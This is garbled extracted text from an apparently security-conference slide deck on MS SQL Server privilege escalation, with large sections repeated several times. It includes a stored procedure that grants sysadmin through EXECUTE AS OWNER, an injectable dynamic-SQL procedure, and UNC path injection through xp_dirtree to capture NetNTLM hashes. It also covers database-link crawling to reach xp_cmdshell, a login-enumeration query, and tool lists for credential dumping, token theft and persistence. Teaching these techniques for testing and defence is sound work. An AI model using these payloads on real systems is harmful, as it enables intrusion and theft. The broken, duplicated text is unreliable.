bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
